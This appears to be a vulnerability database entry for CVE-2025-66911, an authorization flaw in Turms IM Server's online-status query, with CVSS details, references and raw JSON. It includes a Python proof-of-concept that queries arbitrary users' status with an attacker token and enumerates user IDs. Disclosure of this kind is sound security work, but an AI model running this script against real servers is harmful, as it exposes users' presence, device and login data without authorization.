Security Vulnerability Report
CVE-2025-66911 CVSS 6.5 MEDIUM

CVE-2025-66911

Published: 2025-12-19 15:15:57
Last Modified: 2026-01-02 19:49:06

Description

Turms IM Server v0.10.0-SNAPSHOT and earlier contains a broken access control vulnerability in the user online status query functionality. The handleQueryUserOnlineStatusesRequest() method in UserServiceController.java allows any authenticated user to query the online status, device information, and login timestamps of arbitrary users without proper authorization checks.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:* - VULNERABLE
Turms IM Server v0.10.0-SNAPSHOT and earlier versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-66911 PoC - Turms IM Server Unauthorized User Status Query
# Target: Turms IM Server < v0.10.0-SNAPSHOT

TARGET_HOST = "http://target-server:9510"
ATTACKER_TOKEN = "attacker_auth_token_here"


def query_user_online_status(target_user_id):
    """
    Query arbitrary user's online status without authorization
    """
    endpoint = f"{TARGET_HOST}/user/queryOnlineStatuses"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    payload = {
        "userIds": [target_user_id],
        "deviceTypes": True,
        "loginTimestamps": True
    }
    try:
        response = requests.post(endpoint, json=payload, headers=headers)
        if response.status_code == 200:
            data = response.json()
            print(f"[+] Successfully queried user {target_user_id}")
            print(f"[+] Response: {json.dumps(data, indent=2)}")
            return data
        else:
            print(f"[-] Failed: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None


def enumerate_users(start_id=1, count=10):
    """
    Enumerate multiple users' online status
    """
    print(f"[*] Enumerating {count} users starting from ID {start_id}")
    for user_id in range(start_id, start_id + count):
        query_user_online_status(user_id)


if __name__ == "__main__":
    # Query specific user
    target_user = 12345
    query_user_online_status(target_user)
    # Or enumerate multiple users
    enumerate_users(1, 100)

References

https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md (Exploit, Third Party Advisory)
https://github.com/turms-im/turms (Product)
https://github.com/turms-im/turms/blob/develop/turms-service/src/main/java/im/turms/service/domain/user/access/servicerequest/controller/UserServiceController.java#L239 (Product)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-66911",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-19T15:15:56.900",
    "lastModified": "2026-01-02T19:49:06.317",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Turms IM Server v0.10.0-SNAPSHOT and earlier contains a broken access control vulnerability in the user online status query functionality. The handleQueryUserOnlineStatusesRequest() method in UserServiceController.java allows any authenticated user to query the online status, device information, and login timestamps of arbitrary users without proper authorization checks."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-284"},
          {"lang": "en", "value": "CWE-639"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:turms-im:turms:0.10.0-snapshot:*:*:*:*:*:*:*",
                "matchCriteriaId": "9466432E-2863-4A5B-913F-E6E64090F60B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]},
      {"url": "https://github.com/turms-im/turms", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/turms-im/turms/blob/develop/turms-service/src/main/java/im/turms/service/domain/user/access/servicerequest/controller/UserServiceController.java#L239", "source": "[email protected]", "tags": ["Product"]},
      {"url": "https://github.com/Xzzz111/public_cve_report/blob/main/CVE-2025-66911_report.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}
    ]
  }
}